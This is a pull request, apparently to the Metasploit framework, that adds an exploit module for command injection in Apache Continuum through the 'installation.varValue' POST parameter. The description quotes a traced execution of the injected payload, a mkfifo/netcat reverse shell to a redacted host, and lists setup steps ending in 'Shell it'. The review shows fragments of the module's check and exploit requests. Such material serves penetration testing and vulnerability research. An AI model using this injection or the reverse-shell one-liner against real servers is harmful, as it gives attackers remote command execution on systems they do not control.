### PR TITLE
Add Apache Continuum exploit

### PR DESCRIPTION
**Pull request by wvu**
**What is it?**

> Apache Continuum™ is an enterprise-ready continuous integration server with features such as automated builds, release management, role-based security, and integration with popular build tools and source control management systems.

**How does it work?**

This one's another simple command injection through a POST parameter. `installation.varValue` is the injectable variable. It appears to be `$JAVA_HOME`. :)

Here's why you need backticks (or an equivalent escape):

```
[pid 11250] execve("/bin/sh", ["/bin/sh", "-c", "\"`mkfifo /tmp/qpeaccl; nc [redacted] 4444 0</tmp/qpeaccl | /bin/sh >/tmp/qpeaccl 2>&1; rm /tmp/qpeaccl `/bin/java\" -version"], [/* 69 vars */]) = 0
```

The quoting screws it up. At least they're quoting variables properly. :D

**Verification steps:**
- [x] http://mirrors.sonic.net/apache/continuum/binaries/apache-continuum-1.4.2-bin.tar.gz
- [x] `tar xf apache-continuum-1.4.2-bin.tar.gz`
- [x] `apache-continuum-1.4.2/bin/continuum console`
- [x] Add an admin user in the web interface (port 8080)
- [x] Shell it

### CODE REVIEW

File: modules/exploits/linux/http/apache_continuum_cmd_exec.rb [hunk 1]
```diff
@@ -0,0 +1,76 @@
...
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/continuum/about.action'
```
Comment (espreto) [inline modules/exploits/linux/http/apache_continuum_cmd_exec.rb]: ```      'uri'    => normalize_uri(target_uri.path, 'continuum', 'about.action') ``` :)

File: modules/exploits/linux/http/apache_continuum_cmd_exec.rb [hunk 2]
```diff
@@ -0,0 +1,76 @@
...
+      CheckCode::Detected
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/continuum/saveInstallation.action',
```
Comment (espreto) [inline modules/exploits/linux/http/apache_continuum_cmd_exec.rb]: ```'uri'    => normalize_uri(target_uri.path, 'continuum', 'saveInstallation.action') ``` :)

File: modules/exploits/linux/http/apache_continuum_cmd_exec.rb (hunk 1 above)
Comment (wvu-r7) [inline modules/exploits/linux/http/apache_continuum_cmd_exec.rb]: This is a static path. There is no ```TARGETURI```.

File: modules/exploits/linux/http/apache_continuum_cmd_exec.rb (hunk 2 above)
Comment (wvu-r7) [inline modules/exploits/linux/http/apache_continuum_cmd_exec.rb]: Also a static path. :)

**Comment by wwebb-r7** [comment]
Merged, good job

**Comment by tdoan-r7** [comment]
@wvu-r7 add docs so thao won't be sad.

**Pull request merged**